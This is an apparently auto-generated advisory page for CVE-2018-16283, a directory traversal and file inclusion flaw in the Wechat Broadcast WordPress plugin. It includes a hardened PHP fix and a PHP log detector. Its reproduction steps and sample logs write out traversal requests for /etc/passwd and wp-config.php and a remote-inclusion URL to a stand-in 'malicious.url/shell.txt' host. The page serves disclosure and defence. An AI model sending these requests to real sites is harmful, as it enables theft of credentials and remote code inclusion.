Severity: Unrated. OSV Advisory. Published Sep 24, 2018. Updated Aug 5, 2024.

CVE-2018-16283

Description

The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"Missing input validation on the `url` parameter in Image.php allows directory traversal and file inclusion."

Attack vector

An unauthenticated attacker sends a GET request to `/wp-content/plugins/wechat-broadcast/wechat/Image.php` with a `url` parameter containing path traversal sequences (e.g., `../../../../etc/passwd`) or a remote URL. The vulnerable code `file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '')` passes the unsanitized parameter directly to `file_get_contents()`, enabling local file inclusion (LFI) or remote file inclusion (RFI) [ref_id=1]. The attacker only needs HTTP/1.0 protocol access to the WordPress site [ref_id=1].

Affected code

The vulnerable file is `/wechat-broadcast/wechat/Image.php` [ref_id=1]. The offending line is `echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');` which passes the unsanitized `url` parameter directly to `file_get_contents()` [ref_id=1].

What the fix does

No patch is published in the bundle. The advisory [ref_id=1] identifies the root cause as the unsanitized `$_GET["url"]` parameter passed directly to `file_get_contents()`. The remediation would require validating the `url` parameter against an allowlist of permitted paths or domains, or removing the raw user-controlled file read entirely.
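The attack vector and fix sections above describe the unsanitized `url` parameter reaching `file_get_contents()` and the allowlist-based remediation. The following PHP is an added example, not the plugin's own code or a published patch: it places the advisory's offending pattern beside a hardened replacement that accepts only a bare file name, resolves it inside a fixed directory, and refuses anything that escapes that directory. The `images` directory, the `IMAGE_TYPES` map and the handler shape at the bottom are assumptions for illustration.

```php
<?php
// Added example, not the plugin's own code. The images directory, the
// IMAGE_TYPES map and the request handler at the bottom are assumptions.

// Extension allowlist (assumed): only these are ever served.
const IMAGE_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

// The advisory's offending pattern: the raw url parameter reaches
// file_get_contents(), so "../" sequences and remote/wrapper URLs are honoured.
// Kept here for comparison only; it must not be deployed.
function vulnerable_image_read(): string
{
    return file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
}

// Hardened replacement: bare file name only, resolved under a fixed directory.
function safe_image_read(string $requested, string $imageDir): ?string
{
    // A bare name only: no "/", no "\", no scheme prefix such as http:// or php://.
    if (preg_match('/^[A-Za-z0-9_.-]+$/', $requested) !== 1) {
        return null;
    }
    // Dot-only names ("." or "..") pass the character check; reject them explicitly.
    if (trim($requested, '.') === '') {
        return null;
    }
    $base = realpath($imageDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ".." and symlinks, so the prefix check is meaningful.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Serve only regular files whose extension is in the allowlist.
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!is_file($candidate) || !isset(IMAGE_TYPES[$ext])) {
        return null;
    }
    return file_get_contents($candidate);
}

// Assumed request handler: anything rejected above becomes a 404, never file contents.
$imageDir = __DIR__ . '/images'; // assumed allowlisted directory
$name = (isset($_GET['url']) && is_string($_GET['url'])) ? $_GET['url'] : '';
$data = safe_image_read($name, $imageDir);
if ($data === null) {
    http_response_code(404);
    exit;
}
$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
header('Content-Type: ' . IMAGE_TYPES[$ext]);
echo $data;
```

The character allowlist alone already blocks traversal and remote URLs; the `realpath()` prefix check is kept as a second, independent barrier so that a future relaxation of the name rule does not silently reopen the directory escape.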

Preconditions

  • Network: Attacker must be able to send HTTP GET requests to the WordPress site.
  • Input: The vulnerable plugin (Wechat Broadcast 1.2.0 or earlier) must be installed and active.

Reproduction

1. Ensure the Wechat Broadcast plugin 1.2.0 or earlier is installed on a WordPress site.
2. Send a GET request to `/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd` to read local files.
3. Alternatively, use a remote URL such as `http://malicious.url/shell.txt` for remote file inclusion [ref_id=1].
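For sites that cannot be patched immediately, the request shapes listed in the reproduction steps are straightforward to spot in web server logs. The following PHP is an added example, not part of the advisory: it parses access-log lines, isolates requests to the plugin's `Image.php`, and flags a `url` parameter that carries a `..` path segment or a scheme prefix. The log lines are constructed for illustration, with the target path taken from the advisory; the decoding step matters because `..%2F` in the raw request becomes `../` once the parameter is parsed.

```php
<?php
// Added example, not from the advisory. Log lines below are constructed.

const IMAGE_PHP_SUFFIX = '/wechat-broadcast/wechat/Image.php';

// Returns null for lines that do not target Image.php; otherwise the decoded
// url parameter and the reasons (if any) it looks like traversal or inclusion.
function classify_image_request(string $line): ?array
{
    // Request target sits between the method and the protocol in the quoted section.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $target = $m[1];
    $path = parse_url($target, PHP_URL_PATH);
    if (!is_string($path) || substr($path, -strlen(IMAGE_PHP_SUFFIX)) !== IMAGE_PHP_SUFFIX) {
        return null;
    }
    $query = parse_url($target, PHP_URL_QUERY);
    $params = [];
    parse_str(is_string($query) ? $query : '', $params); // parse_str URL-decodes values
    $url = isset($params['url']) && is_string($params['url']) ? $params['url'] : '';

    $reasons = [];
    // A ".." path segment bounded by a separator or the string edge.
    if (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $url)) {
        $reasons[] = 'path traversal segment';
    }
    // A scheme prefix (http:, php:, data:, ...) means a remote URL or stream wrapper.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $url)) {
        $reasons[] = 'remote URL or stream wrapper';
    }
    return ['url' => $url, 'suspicious' => $reasons !== [], 'reasons' => $reasons];
}

// Constructed sample log lines (combined log format).
$lines = [
    '203.0.113.5 - - [24/Sep/2018:10:01:02 +0000] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../etc/passwd HTTP/1.0" 200 1412',
    '203.0.113.5 - - [24/Sep/2018:10:01:09 +0000] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3021',
    '198.51.100.7 - - [24/Sep/2018:10:02:00 +0000] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://example.invalid/shell.txt HTTP/1.1" 200 88',
    '192.0.2.9 - - [24/Sep/2018:10:03:00 +0000] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=logo.png HTTP/1.1" 200 5120',
    '192.0.2.9 - - [24/Sep/2018:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 8000',
];

foreach ($lines as $i => $line) {
    $result = classify_image_request($line);
    if ($result === null || !$result['suspicious']) {
        continue;
    }
    printf("line %d: url=%s (%s)\n", $i + 1, $result['url'], implode(', ', $result['reasons']));
}
```

On the sample above, the first three lines are reported and the benign `logo.png` request and the unrelated `index.php` request are not. A `200` status on a flagged line is the signal to treat the host as exposed and to review what the returned byte count corresponds to.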

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
